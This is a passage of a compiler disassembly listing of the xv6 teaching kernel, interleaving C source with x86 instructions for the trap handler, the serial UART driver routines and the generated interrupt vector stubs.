-0x20(%ebp),%edx cprintf("unexpected trap %d from cpu %d eip %x (cr2=0x%x)\n", tf->trapno, cpuid(), tf->eip, rcr2()); panic("trap"); } // In user space, assume process misbehaved. cprintf("pid %d %s: trap %d err %d on cpu %d " 80105a09: ff 75 e4 pushl -0x1c(%ebp) 80105a0c: 56 push %esi 80105a0d: 53 push %ebx "eip 0x%x addr 0x%x--kill proc\n", myproc()->pid, myproc()->name, tf->trapno, 80105a0e: 83 c2 6c add $0x6c,%edx cprintf("unexpected trap %d from cpu %d eip %x (cr2=0x%x)\n", tf->trapno, cpuid(), tf->eip, rcr2()); panic("trap"); } // In user space, assume process misbehaved. cprintf("pid %d %s: trap %d err %d on cpu %d " 80105a11: 52 push %edx 80105a12: ff 70 10 pushl 0x10(%eax) 80105a15: 68 a0 7a 10 80 push $0x80107aa0 80105a1a: e8 41 ac ff ff call 80100660 <cprintf> "eip 0x%x addr 0x%x--kill proc\n", myproc()->pid, myproc()->name, tf->trapno, tf->err, cpuid(), tf->eip, rcr2()); myproc()->killed = 1; 80105a1f: 83 c4 20 add $0x20,%esp 80105a22: e8 59 dd ff ff call 80103780 <myproc> 80105a27: c7 40 24 01 00 00 00 movl $0x1,0x24(%eax) 80105a2e: 66 90 xchg %ax,%ax } // Force process exit if it has been killed and is in user space. // (If it is still executing in the kernel, let it keep running // until it gets to the regular system call return.) if(myproc() && myproc()->killed && (tf->cs&3) == DPL_USER) 80105a30: e8 4b dd ff ff call 80103780 <myproc> 80105a35: 85 c0 test %eax,%eax 80105a37: 74 0c je 80105a45 <trap+0xb5> 80105a39: e8 42 dd ff ff call 80103780 <myproc> 80105a3e: 8b 50 24 mov 0x24(%eax),%edx 80105a41: 85 d2 test %edx,%edx 80105a43: 75 4b jne 80105a90 <trap+0x100> exit(); // Force process to give up CPU on clock tick. // If interrupts were on while locks held, would need to check nlock. if(myproc() && myproc()->state == RUNNING && 80105a45: e8 36 dd ff ff call 80103780 <myproc> 80105a4a: 85 c0 test %eax,%eax 80105a4c: 74 0b je 80105a59 <trap+0xc9> 80105a4e: e8 2d dd ff ff call 80103780 <myproc> 80105a53: 83 78 0c 04 cmpl $0x4,0xc(%eax) 80105a57: 74 4f je 80105aa8 <trap+0x118> tf->trapno == T_IRQ0+IRQ_TIMER) yield(); // Check if the process has been killed since we yielded if(myproc() && myproc()->killed && (tf->cs&3) == DPL_USER) 80105a59: e8 22 dd ff ff call 80103780 <myproc> 80105a5e: 85 c0 test %eax,%eax 80105a60: 74 1d je 80105a7f <trap+0xef> 80105a62: e8 19 dd ff ff call 80103780 <myproc> 80105a67: 8b 40 24 mov 0x24(%eax),%eax 80105a6a: 85 c0 test %eax,%eax 80105a6c: 74 11 je 80105a7f <trap+0xef> 80105a6e: 0f b7 47 3c movzwl 0x3c(%edi),%eax 80105a72: 83 e0 03 and $0x3,%eax 80105a75: 66 83 f8 03 cmp $0x3,%ax 80105a79: 0f 84 da 00 00 00 je 80105b59 <trap+0x1c9> exit(); } 80105a7f: 8d 65 f4 lea -0xc(%ebp),%esp 80105a82: 5b pop %ebx 80105a83: 5e pop %esi 80105a84: 5f pop %edi 80105a85: 5d pop %ebp 80105a86: c3 ret 80105a87: 89 f6 mov %esi,%esi 80105a89: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi } // Force process exit if it has been killed and is in user space. // (If it is still executing in the kernel, let it keep running // until it gets to the regular system call return.) if(myproc() && myproc()->killed && (tf->cs&3) == DPL_USER) 80105a90: 0f b7 47 3c movzwl 0x3c(%edi),%eax 80105a94: 83 e0 03 and $0x3,%eax 80105a97: 66 83 f8 03 cmp $0x3,%ax 80105a9b: 75 a8 jne 80105a45 <trap+0xb5> exit(); 80105a9d: e8 0e e1 ff ff call 80103bb0 <exit> 80105aa2: eb a1 jmp 80105a45 <trap+0xb5> 80105aa4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi // Force process to give up CPU on clock tick. // If interrupts were on while locks held, would need to check nlock. if(myproc() && myproc()->state == RUNNING && 80105aa8: 83 7f 30 20 cmpl $0x20,0x30(%edi) 80105aac: 75 ab jne 80105a59 <trap+0xc9> tf->trapno == T_IRQ0+IRQ_TIMER) yield(); 80105aae: e8 2d e2 ff ff call 80103ce0 <yield> 80105ab3: eb a4 jmp 80105a59 <trap+0xc9> 80105ab5: 8d 76 00 lea 0x0(%esi),%esi return; } switch(tf->trapno){ case T_IRQ0 + IRQ_TIMER: if(cpuid() == 0){ 80105ab8: e8 a3 dc ff ff call 80103760 <cpuid> 80105abd: 85 c0 test %eax,%eax 80105abf: 0f 84 ab 00 00 00 je 80105b70 <trap+0x1e0> } lapiceoi(); break; case T_IRQ0 + IRQ_IDE: ideintr(); lapiceoi(); 80105ac5: e8 46 cc ff ff call 80102710 <lapiceoi> break; 80105aca: e9 61 ff ff ff jmp 80105a30 <trap+0xa0> 80105acf: 90 nop case T_IRQ0 + IRQ_IDE+1: // Bochs generates spurious IDE1 interrupts. break; case T_IRQ0 + IRQ_KBD: kbdintr(); 80105ad0: e8 fb ca ff ff call 801025d0 <kbdintr> lapiceoi(); 80105ad5: e8 36 cc ff ff call 80102710 <lapiceoi> break; 80105ada: e9 51 ff ff ff jmp 80105a30 <trap+0xa0> 80105adf: 90 nop case T_IRQ0 + IRQ_COM1: uartintr(); 80105ae0: e8 5b 02 00 00 call 80105d40 <uartintr> lapiceoi(); 80105ae5: e8 26 cc ff ff call 80102710 <lapiceoi> break; 80105aea: e9 41 ff ff ff jmp 80105a30 <trap+0xa0> 80105aef: 90 nop case T_IRQ0 + 7: case T_IRQ0 + IRQ_SPURIOUS: cprintf("cpu%d: spurious interrupt at %x:%x\n", 80105af0: 0f b7 5f 3c movzwl 0x3c(%edi),%ebx 80105af4: 8b 77 38 mov 0x38(%edi),%esi 80105af7: e8 64 dc ff ff call 80103760 <cpuid> 80105afc: 56 push %esi 80105afd: 53 push %ebx 80105afe: 50 push %eax 80105aff: 68 48 7a 10 80 push $0x80107a48 80105b04: e8 57 ab ff ff call 80100660 <cprintf> cpuid(), tf->cs, tf->eip); lapiceoi(); 80105b09: e8 02 cc ff ff call 80102710 <lapiceoi> break; 80105b0e: 83 c4 10 add $0x10,%esp 80105b11: e9 1a ff ff ff jmp 80105a30 <trap+0xa0> 80105b16: 8d 76 00 lea 0x0(%esi),%esi 80105b19: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi release(&tickslock); } lapiceoi(); break; case T_IRQ0 + IRQ_IDE: ideintr(); 80105b20: e8 2b c5 ff ff call 80102050 <ideintr> 80105b25: eb 9e jmp 80105ac5 <trap+0x135> 80105b27: 89 f6 mov %esi,%esi 80105b29: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi //PAGEBREAK: 41 void trap(struct trapframe *tf) { if(tf->trapno == T_SYSCALL){ if(myproc()->killed) 80105b30: e8 4b dc ff ff call 80103780 <myproc> 80105b35: 8b 58 24 mov 0x24(%eax),%ebx 80105b38: 85 db test %ebx,%ebx 80105b3a: 75 2c jne 80105b68 <trap+0x1d8> exit(); myproc()->tf = tf; 80105b3c: e8 3f dc ff ff call 80103780 <myproc> 80105b41: 89 78 18 mov %edi,0x18(%eax) syscall(); 80105b44: e8 47 ef ff ff call 80104a90 <syscall> if(myproc()->killed) 80105b49: e8 32 dc ff ff call 80103780 <myproc> 80105b4e: 8b 48 24 mov 0x24(%eax),%ecx 80105b51: 85 c9 test %ecx,%ecx 80105b53: 0f 84 26 ff ff ff je 80105a7f <trap+0xef> yield(); // Check if the process has been killed since we yielded if(myproc() && myproc()->killed && (tf->cs&3) == DPL_USER) exit(); } 80105b59: 8d 65 f4 lea -0xc(%ebp),%esp 80105b5c: 5b pop %ebx 80105b5d: 5e pop %esi 80105b5e: 5f pop %edi 80105b5f: 5d pop %ebp if(myproc()->killed) exit(); myproc()->tf = tf; syscall(); if(myproc()->killed) exit(); 80105b60: e9 4b e0 ff ff jmp 80103bb0 <exit> 80105b65: 8d 76 00 lea 0x0(%esi),%esi void trap(struct trapframe *tf) { if(tf->trapno == T_SYSCALL){ if(myproc()->killed) exit(); 80105b68: e8 43 e0 ff ff call 80103bb0 <exit> 80105b6d: eb cd jmp 80105b3c <trap+0x1ac> 80105b6f: 90 nop } switch(tf->trapno){ case T_IRQ0 + IRQ_TIMER: if(cpuid() == 0){ acquire(&tickslock); 80105b70: 83 ec 0c sub $0xc,%esp 80105b73: 68 80 54 11 80 push $0x80115480 80105b78: e8 a3 e9 ff ff call 80104520 <acquire> ticks++; wakeup(&ticks); 80105b7d: c7 04 24 c0 5c 11 80 movl $0x80115cc0,(%esp) switch(tf->trapno){ case T_IRQ0 + IRQ_TIMER: if(cpuid() == 0){ acquire(&tickslock); ticks++; 80105b84: 83 05 c0 5c 11 80 01 addl $0x1,0x80115cc0 wakeup(&ticks); 80105b8b: e8 50 e3 ff ff call 80103ee0 <wakeup> release(&tickslock); 80105b90: c7 04 24 80 54 11 80 movl $0x80115480,(%esp) 80105b97: e8 a4 ea ff ff call 80104640 <release> 80105b9c: 83 c4 10 add $0x10,%esp 80105b9f: e9 21 ff ff ff jmp 80105ac5 <trap+0x135> 80105ba4: 0f 20 d6 mov %cr2,%esi //PAGEBREAK: 13 default: if(myproc() == 0 || (tf->cs&3) == 0){ // In kernel, it must be our mistake. cprintf("unexpected trap %d from cpu %d eip %x (cr2=0x%x)\n", 80105ba7: 8b 5f 38 mov 0x38(%edi),%ebx 80105baa: e8 b1 db ff ff call 80103760 <cpuid> 80105baf: 83 ec 0c sub $0xc,%esp 80105bb2: 56 push %esi 80105bb3: 53 push %ebx 80105bb4: 50 push %eax 80105bb5: ff 77 30 pushl 0x30(%edi) 80105bb8: 68 6c 7a 10 80 push $0x80107a6c 80105bbd: e8 9e aa ff ff call 80100660 <cprintf> tf->trapno, cpuid(), tf->eip, rcr2()); panic("trap"); 80105bc2: 83 c4 14 add $0x14,%esp 80105bc5: 68 42 7a 10 80 push $0x80107a42 80105bca: e8 a1 a7 ff ff call 80100370 <panic> 80105bcf: 90 nop 80105bd0 <uartgetc>: } static int uartgetc(void) { if(!uart) 80105bd0: a1 c0 a5 10 80 mov 0x8010a5c0,%eax outb(COM1+0, c); } static int uartgetc(void) { 80105bd5: 55 push %ebp 80105bd6: 89 e5 mov %esp,%ebp if(!uart) 80105bd8: 85 c0 test %eax,%eax 80105bda: 74 1c je 80105bf8 <uartgetc+0x28> static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80105bdc: ba fd 03 00 00 mov $0x3fd,%edx 80105be1: ec in (%dx),%al return -1; if(!(inb(COM1+5) & 0x01)) 80105be2: a8 01 test $0x1,%al 80105be4: 74 12 je 80105bf8 <uartgetc+0x28> 80105be6: ba f8 03 00 00 mov $0x3f8,%edx 80105beb: ec in (%dx),%al return -1; return inb(COM1+0); 80105bec: 0f b6 c0 movzbl %al,%eax } 80105bef: 5d pop %ebp 80105bf0: c3 ret 80105bf1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi static int uartgetc(void) { if(!uart) return -1; 80105bf8: b8 ff ff ff ff mov $0xffffffff,%eax if(!(inb(COM1+5) & 0x01)) return -1; return inb(COM1+0); } 80105bfd: 5d pop %ebp 80105bfe: c3 ret 80105bff: 90 nop 80105c00 <uartputc.part.0>: for(p="xv6...\n"; *p; p++) uartputc(*p); } void uartputc(int c) 80105c00: 55 push %ebp 80105c01: 89 e5 mov %esp,%ebp 80105c03: 57 push %edi 80105c04: 56 push %esi 80105c05: 53 push %ebx 80105c06: 89 c7 mov %eax,%edi 80105c08: bb 80 00 00 00 mov $0x80,%ebx 80105c0d: be fd 03 00 00 mov $0x3fd,%esi 80105c12: 83 ec 0c sub $0xc,%esp 80105c15: eb 1b jmp 80105c32 <uartputc.part.0+0x32> 80105c17: 89 f6 mov %esi,%esi 80105c19: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi int i; if(!uart) return; for(i = 0; i < 128 && !(inb(COM1+5) & 0x20); i++) microdelay(10); 80105c20: 83 ec 0c sub $0xc,%esp 80105c23: 6a 0a push $0xa 80105c25: e8 06 cb ff ff call 80102730 <microdelay> { int i; if(!uart) return; for(i = 0; i < 128 && !(inb(COM1+5) & 0x20); i++) 80105c2a: 83 c4 10 add $0x10,%esp 80105c2d: 83 eb 01 sub $0x1,%ebx 80105c30: 74 07 je 80105c39 <uartputc.part.0+0x39> 80105c32: 89 f2 mov %esi,%edx 80105c34: ec in (%dx),%al 80105c35: a8 20 test $0x20,%al 80105c37: 74 e7 je 80105c20 <uartputc.part.0+0x20> } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80105c39: ba f8 03 00 00 mov $0x3f8,%edx 80105c3e: 89 f8 mov %edi,%eax 80105c40: ee out %al,(%dx) microdelay(10); outb(COM1+0, c); } 80105c41: 8d 65 f4 lea -0xc(%ebp),%esp 80105c44: 5b pop %ebx 80105c45: 5e pop %esi 80105c46: 5f pop %edi 80105c47: 5d pop %ebp 80105c48: c3 ret 80105c49: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80105c50 <uartinit>: static int uart; // is there a uart? void uartinit(void) { 80105c50: 55 push %ebp 80105c51: 31 c9 xor %ecx,%ecx 80105c53: 89 c8 mov %ecx,%eax 80105c55: 89 e5 mov %esp,%ebp 80105c57: 57 push %edi 80105c58: 56 push %esi 80105c59: 53 push %ebx 80105c5a: bb fa 03 00 00 mov $0x3fa,%ebx 80105c5f: 89 da mov %ebx,%edx 80105c61: 83 ec 0c sub $0xc,%esp 80105c64: ee out %al,(%dx) 80105c65: bf fb 03 00 00 mov $0x3fb,%edi 80105c6a: b8 80 ff ff ff mov $0xffffff80,%eax 80105c6f: 89 fa mov %edi,%edx 80105c71: ee out %al,(%dx) 80105c72: b8 0c 00 00 00 mov $0xc,%eax 80105c77: ba f8 03 00 00 mov $0x3f8,%edx 80105c7c: ee out %al,(%dx) 80105c7d: be f9 03 00 00 mov $0x3f9,%esi 80105c82: 89 c8 mov %ecx,%eax 80105c84: 89 f2 mov %esi,%edx 80105c86: ee out %al,(%dx) 80105c87: b8 03 00 00 00 mov $0x3,%eax 80105c8c: 89 fa mov %edi,%edx 80105c8e: ee out %al,(%dx) 80105c8f: ba fc 03 00 00 mov $0x3fc,%edx 80105c94: 89 c8 mov %ecx,%eax 80105c96: ee out %al,(%dx) 80105c97: b8 01 00 00 00 mov $0x1,%eax 80105c9c: 89 f2 mov %esi,%edx 80105c9e: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80105c9f: ba fd 03 00 00 mov $0x3fd,%edx 80105ca4: ec in (%dx),%al outb(COM1+3, 0x03); // Lock divisor, 8 data bits. outb(COM1+4, 0); outb(COM1+1, 0x01); // Enable receive interrupts. // If status is 0xFF, no serial port. if(inb(COM1+5) == 0xFF) 80105ca5: 3c ff cmp $0xff,%al 80105ca7: 74 5a je 80105d03 <uartinit+0xb3> return; uart = 1; 80105ca9: c7 05 c0 a5 10 80 01 movl $0x1,0x8010a5c0 80105cb0: 00 00 00 80105cb3: 89 da mov %ebx,%edx 80105cb5: ec in (%dx),%al 80105cb6: ba f8 03 00 00 mov $0x3f8,%edx 80105cbb: ec in (%dx),%al // Acknowledge pre-existing interrupt conditions; // enable interrupts. inb(COM1+2); inb(COM1+0); ioapicenable(IRQ_COM1, 0); 80105cbc: 83 ec 08 sub $0x8,%esp 80105cbf: bb 64 7b 10 80 mov $0x80107b64,%ebx 80105cc4: 6a 00 push $0x0 80105cc6: 6a 04 push $0x4 80105cc8: e8 d3 c5 ff ff call 801022a0 <ioapicenable> 80105ccd: 83 c4 10 add $0x10,%esp 80105cd0: b8 78 00 00 00 mov $0x78,%eax 80105cd5: eb 13 jmp 80105cea <uartinit+0x9a> 80105cd7: 89 f6 mov %esi,%esi 80105cd9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi // Announce that we're here. for(p="xv6...\n"; *p; p++) 80105ce0: 83 c3 01 add $0x1,%ebx 80105ce3: 0f be 03 movsbl (%ebx),%eax 80105ce6: 84 c0 test %al,%al 80105ce8: 74 19 je 80105d03 <uartinit+0xb3> void uartputc(int c) { int i; if(!uart) 80105cea: 8b 15 c0 a5 10 80 mov 0x8010a5c0,%edx 80105cf0: 85 d2 test %edx,%edx 80105cf2: 74 ec je 80105ce0 <uartinit+0x90> inb(COM1+2); inb(COM1+0); ioapicenable(IRQ_COM1, 0); // Announce that we're here. for(p="xv6...\n"; *p; p++) 80105cf4: 83 c3 01 add $0x1,%ebx 80105cf7: e8 04 ff ff ff call 80105c00 <uartputc.part.0> 80105cfc: 0f be 03 movsbl (%ebx),%eax 80105cff: 84 c0 test %al,%al 80105d01: 75 e7 jne 80105cea <uartinit+0x9a> uartputc(*p); } 80105d03: 8d 65 f4 lea -0xc(%ebp),%esp 80105d06: 5b pop %ebx 80105d07: 5e pop %esi 80105d08: 5f pop %edi 80105d09: 5d pop %ebp 80105d0a: c3 ret 80105d0b: 90 nop 80105d0c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80105d10 <uartputc>: void uartputc(int c) { int i; if(!uart) 80105d10: 8b 15 c0 a5 10 80 mov 0x8010a5c0,%edx uartputc(*p); } void uartputc(int c) { 80105d16: 55 push %ebp 80105d17: 89 e5 mov %esp,%ebp int i; if(!uart) 80105d19: 85 d2 test %edx,%edx uartputc(*p); } void uartputc(int c) { 80105d1b: 8b 45 08 mov 0x8(%ebp),%eax int i; if(!uart) 80105d1e: 74 10 je 80105d30 <uartputc+0x20> return; for(i = 0; i < 128 && !(inb(COM1+5) & 0x20); i++) microdelay(10); outb(COM1+0, c); } 80105d20: 5d pop %ebp 80105d21: e9 da fe ff ff jmp 80105c00 <uartputc.part.0> 80105d26: 8d 76 00 lea 0x0(%esi),%esi 80105d29: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80105d30: 5d pop %ebp 80105d31: c3 ret 80105d32: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80105d39: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80105d40 <uartintr>: return inb(COM1+0); } void uartintr(void) { 80105d40: 55 push %ebp 80105d41: 89 e5 mov %esp,%ebp 80105d43: 83 ec 14 sub $0x14,%esp consoleintr(uartgetc); 80105d46: 68 d0 5b 10 80 push $0x80105bd0 80105d4b: e8 a0 aa ff ff call 801007f0 <consoleintr> } 80105d50: 83 c4 10 add $0x10,%esp 80105d53: c9 leave 80105d54: c3 ret 80105d55 <vector0>: # generated by vectors.pl - do not edit # handlers .globl alltraps .globl vector0 vector0: pushl $0 80105d55: 6a 00 push $0x0 pushl $0 80105d57: 6a 00 push $0x0 jmp alltraps 80105d59: e9 3b fb ff ff jmp 80105899 <alltraps> 80105d5e <vector1>: .globl vector1 vector1: pushl $0 80105d5e: 6a 00 push $0x0 pushl $1 80105d60: 6a 01 push $0x1 jmp alltraps 80105d62: e9 32 fb ff ff jmp 80105899 <alltraps> 80105d67 <vector2>: .globl vector2 vector2: pushl $0 80105d67: 6a 00 push $0x0 pushl $2 80105d69: 6a 02 push $0x2 jmp alltraps 80105d6b: e9 29 fb ff ff jmp 80105899 <alltraps> 80105d70 <vector3>: .globl vector3 vector3: pushl $0 80105d70: 6a 00 push $0x0 pushl $3 80105d72: 6a 03 push $0x3 jmp alltraps 80105d74: e9 20 fb ff ff jmp 80105899 <alltraps> 80105d79 <vector4>: .globl vector4 vector4: pushl $0 80105d79: 6a 00 push $0x0 pushl $4 80105d7b: 6a 04 push $0x4 jmp alltraps 80105d7d: e9 17 fb ff ff jmp 80105899 <alltraps> 80105d82 <vector5>: .globl vector5 vector5: pushl $0 80105d82: 6a 00 push $0x0 pushl $5 80105d84: 6a 05 push $0x5 jmp alltraps 80105d86: e9 0e fb ff ff jmp 80105899 <alltraps> 80105d8b <vector6>: .globl vector6 vector6: pushl $0 80105d8b: 6a 00 push $0x0 pushl $6 80105d8d: 6a 06 push $0x6 jmp alltraps 80105d8f: e9 05 fb ff ff jmp 80105899 <alltraps> 80105d94 <vector7>: .globl vector7 vector7: pushl $0 80105d94: 6a 00 push $0x0 pushl $7 80105d96: 6a 07 push $0x7 jmp alltraps 80105d98: e9 fc fa ff ff jmp 80105899 <alltraps> 80105d9d <vector8>: .globl vector8 vector8: pushl $8 80105d9d: 6a 08 push $0x8 jmp alltraps 80105d9f: e9 f5 fa ff ff jmp 80105899 <alltraps> 80105da4 <vector9>: .globl vector9 vector9: pushl $0 80105da4: 6a 00 push $0x0 pushl $9 80105da6: 6a 09 push $0x9 jmp alltraps 80105da8: e9 ec fa ff ff jmp 80105899 <alltraps> 80105dad <vector10>: .globl vector10 vector10: pushl $10 80105dad: 6a 0a push $0xa jmp alltraps 80105daf: e9 e5 fa ff ff jmp 80105899 <alltraps> 80105db4 <vector11>: .globl vector11 vector11: pushl $11 80105db4: 6a 0b push $0xb jmp alltraps 80105db6: e9 de fa ff ff jmp 80105899 <alltraps> 80105dbb <vector12>: .globl vector12 vector12: pushl $12 80105dbb: 6a 0c push $0xc jmp alltraps 80105dbd: e9 d7 fa ff ff jmp 80105899 <alltraps> 80105dc2 <vector13>: .globl vector13 vector13: pushl $13 80105dc2: 6a 0d push $0xd jmp alltraps 80105dc4: e9 d0 fa ff ff jmp 80105899 <alltraps> 80105dc9 <vector14>: .globl vector14 vector14: pushl $14 80105dc9: 6a 0e push $0xe jmp alltraps 80105dcb: e9 c9 fa ff ff jmp 80105899 <alltraps> 80105dd0 <vector15>: .globl vector15 vector15: pushl $0 80105dd0: 6a 00 push $0x0 pushl $15 80105dd2: 6a 0f push $0xf jmp alltraps 80105dd4: e9 c0 fa ff ff jmp 80105899 <alltraps> 80105dd9 <vector16>: .globl vector16 vector16: pushl $0 80105dd9: 6a 00 push $0x0 pushl $16 80105ddb: 6a 10 push $0x10 jmp alltraps 80105ddd: e9 b7 fa ff ff jmp 80105899 <alltraps> 80105de2 <vector17>: .globl vector17 vector17: pushl $17 80105de2: 6a 11 push $0x11 jmp alltraps 80105de4: e9 b0 fa ff ff jmp 80105899 <alltraps> 80105de9 <vector18>: .globl vector18 vector18: pushl $0 80105de9: 6a 00 push $0x0 pushl $18 80105deb: 6a 12 push $0x12 jmp alltraps 80105ded: e9 a7 fa ff ff jmp 80105899 <alltraps> 80105df2 <vector19>: .globl vector19 vector19: pushl $0 80105df2: 6a 00 push $0x0 pushl $19 80105df4: 6a 13 push $0x13 jmp alltraps 80105df6: e9 9e fa ff ff jmp 80105899 <alltraps> 80105dfb <vector20>: .globl vector20 vector20: pushl $0 80105dfb: 6a 00 push $0x0 pushl $20 80105dfd: 6a 14 push $0x14 jmp alltraps 80105dff: e9 95 fa ff ff jmp 80105899 <alltraps> 80105e04 <vector21>: .globl vector21 vector21: pushl $0 80105e04: 6a 00 push $0x0 pushl $21 80105e06: 6a 15 push $0x15 jmp alltraps 80105e08: e9 8c fa ff ff jmp 80105899 <alltraps> 80105e0d <vector22>: .globl vector22 vector22: pushl $0 80105e0d: 6a 00 push $0x0 pushl $22 80105e0f: 6a 16 push $0x16 jmp alltraps 80105e11: e9 83 fa ff ff jmp 80105899 <alltraps> 80105e16 <vector23>: .globl vector23 vector23: pushl $0 80105e16: 6a 00 push $0x0 pushl $23 80105e18: 6a 17 push $0x17 jmp alltraps 80105e1a: e9 7a fa ff ff jmp 80105899 <alltraps> 80105e1f <vector24>: .globl vector24 vector24: pushl $0 80105e1f: 6a 00 push $0x0 pushl $24 80105e21: 6a 18 push $0x18 jmp alltraps 80105e23: e9 71 fa ff ff jmp 80105899 <alltraps> 80105e28 <vector25>: .globl vector25 vector25: pushl $0 80105e28: 6a 00 push $0x0 pushl $25 80105e2a: 6a 19 push $0x19 jmp alltraps 80105e2c: e9 68 fa ff ff jmp 80105899 <alltraps> 80105e31 <vector26>: .globl vector26 vector26: pushl $0 80105e31: 6a 00 push $0x0 pushl $26 80105e33: 6a 1a push $0x1a jmp alltraps 80105e35: e9 5f fa ff ff jmp 80105899 <alltraps> 80105e3a <vector27>: .globl vector27 vector27: pushl $0 80105e3a: 6a 00 push $0x0 pushl $27 80105e3c: 6a 1b push $0x1b jmp alltraps 80105e3e: e9 56 fa ff ff jmp 80105899 <alltraps> 80105e43 <vector28>: .globl vector28 vector28: pushl $0 80105e43: 6a 00 push $0x0 pushl $28 80105e45: 6a 1c push $0x1c jmp alltraps 80105e47: e9 4d fa ff ff jmp 80105899 <alltraps> 80105e4c <vector29>: .globl vector29 vector29: pushl $0 80105e4c: 6a 00 push $0x0 pushl $29 80105e4e: 6a 1d push $0x1d jmp alltraps 80105e50: e9 44 fa ff ff jmp 80105899 <alltraps> 80105e55 <vector30>: .globl vector30 vector30: pushl $0 80105e55: 6a 00 push $0x0 pushl $30 80105e57: 6a 1e push $0x1e jmp alltraps 80105e59: e9 3b fa ff ff jmp 80105899 <alltraps> 80105e5e <vector31>: .globl vector31 vector31: pushl $0 80105e5e: 6a 00 push $0x0 pushl $31 80105e60: 6a 1f push $0x1f jmp alltraps 80105e62: e9 32 fa ff ff jmp 80105899 <alltraps> 80105e67 <vector32>: .globl vector32 vector32: pushl $0 80105e67: 6a 00 push $0x0 pushl $32 80105e69: 6a 20 push $0x20 jmp alltraps 80105e6b: e9 29 fa ff ff jmp 80105899 <alltraps> 80105e70 <vector33>: .globl vector33 vector33: pushl $0 80105e70: 6a 00 push $0x0 pushl $33 80105e72: 6a 21 push $0x21 jmp alltraps 80105e74: e9 20 fa ff ff jmp 80105899 <alltraps> 80105e79 <vector34>: .globl vector34 vector34: pushl $0 80105e79: 6a 00 push $0x0 pushl $34 80105e7b: 6a 22 push $0x22 jmp alltraps 80105e7d: e9 17 fa ff ff jmp 80105899 <alltraps> 80105e82 <vector35>: .globl vector35 vector35: pushl $0 80105e82: 6a 00 push $0x0 pushl $35 80105e84: 6a 23 push $0x23 jmp alltraps 80105e86: e9 0e fa ff ff jmp 80105899 <alltraps> 80105e8b <vector36>: .globl vector36 vector36: pushl $0 80105e8b: 6a 00 push $0x0 pushl $36 80105e8d: 6a 24 push $0x24 jmp alltraps 80105e8f: e9 05 fa ff ff jmp 80105899 <alltraps> 80105e94 <vector37>: .globl vector37 vector37: pushl $0 80105e94: 6a 00 push $0x0 pushl $37 80105e96: 6a 25 push $0x25 jmp alltraps 80105e98: e9 fc f9 ff ff jmp 80105899 <alltraps> 80105e9d <vector38>: .globl vector38 vector38: pushl $0 80105e9d: 6a 00 push $0x0 pushl $38 80105e9f: 6a 26 push $0x26 jmp alltraps 80105ea1: e9 f3 f9 ff ff jmp 80105899 <alltraps> 80105ea6 <vector39>: .globl vector39 vector39: pushl $0 80105ea6: 6a 00 push $0x0 pushl $39 80105ea8: 6a 27 push $0x27 jmp alltraps 80105eaa: e9 ea f9 ff ff jmp 80105899 <alltraps> 80105eaf <vector40>: .globl vector40 vector40: pushl $0 80105eaf: 6a 00 push $0x0 pushl $40 80105eb1: 6a 28 push $0x28 jmp alltraps 80105eb3: e9 e1 f9 ff ff jmp 80105899 <alltraps> 80105eb8 <vector41>: .globl vector41 vector41: pushl $0 80105eb8: 6a 00 push $0x0 pushl $41 80105eba: 6a 29 push $0x29 jmp alltraps 80105ebc: e9 d8 f9 ff ff jmp 80105899 <alltraps> 80105ec1 <vector42>: .globl vector42 vector42: pushl $0 80105ec1: 6a 00 push $0x0 pushl $42 80105ec3: 6a 2a push $0x2a jmp alltraps 80105ec5: e9 cf f9 ff ff jmp 80105899 <alltraps> 80105eca <vector43>: .globl vector43 vector43: pushl $0 80105eca: 6a 00 push $0x0 pushl $43 80105ecc: 6a 2b push $0x2b jmp alltraps 80105ece: e9 c6 f9 ff ff jmp 80105899 <alltraps> 80105ed3 <vector44>: .globl vector44 vector44: pushl $0 80105ed3: 6a 00 push $0x0 pushl $44 80105ed5: 6a 2c push $0x2c jmp alltraps 80105ed7: e9 bd f9 ff ff jmp 80105899 <alltraps> 80105edc <vector45>: .globl vector45 vector45: pushl $0 80105edc: 6a 00 push $0x0 pushl $45 80105ede: 6a 2d push $0x2d jmp alltraps 80105ee0: e9 b4 f9 ff ff jmp 80105899 <alltraps> 80105ee5 <vector46>: .globl vector46 vector46: pushl $0 80105ee5: 6a 00 push $0x0 pushl $46 80105ee7: 6a 2e push $0x2e jmp alltraps 80105ee9: e9 ab f9 ff ff jmp 80105899 <alltraps> 80105eee <vector47>: .globl vector47 vector47: pushl $0 80105eee: 6a 00 push $0x0 pushl $47 80105ef0: 6a 2f push $0x2f jmp alltraps 80105ef2: e9 a2 f9 ff ff jmp 80105899 <alltraps> 80105ef7 <vector48>: .globl vector48 vector48: pushl $0 80105ef7: 6a 00 push $0x0 pushl $48 80105ef9: 6a 30 push $0x30 jmp alltraps 80105efb: e9 99 f9 ff ff jmp 80105899 <alltraps> 80105f00 <vector49>: .globl vector49 vector49: pushl $0 80105f00: 6a 00 push $0x0 pushl $49 80105f02: 6a 31 push $0x31 jmp alltraps 80105f04: e9 90 f9 ff ff jmp 80105899 <alltraps> 80105f09 <vector50>: .globl vector50 vector50: pushl $0 80105f09: 6a 00 push $0x0 pushl $50 80105f0b: 6a 32 push $0x32 jmp alltraps 80105f0d: e9 87 f9 ff ff jmp 80105899 <alltraps> 80105f12 <vector51>: .globl vector51 vector51: pushl $0 80105f12: 6a 00 push $0x0 pushl $51 80105f14: 6a 33 push $0x33 jmp alltraps 80105f16: e9 7e f9 ff ff jmp 80105899 <alltraps> 80105f1b <vector52>: .globl vector52 vector52: pushl 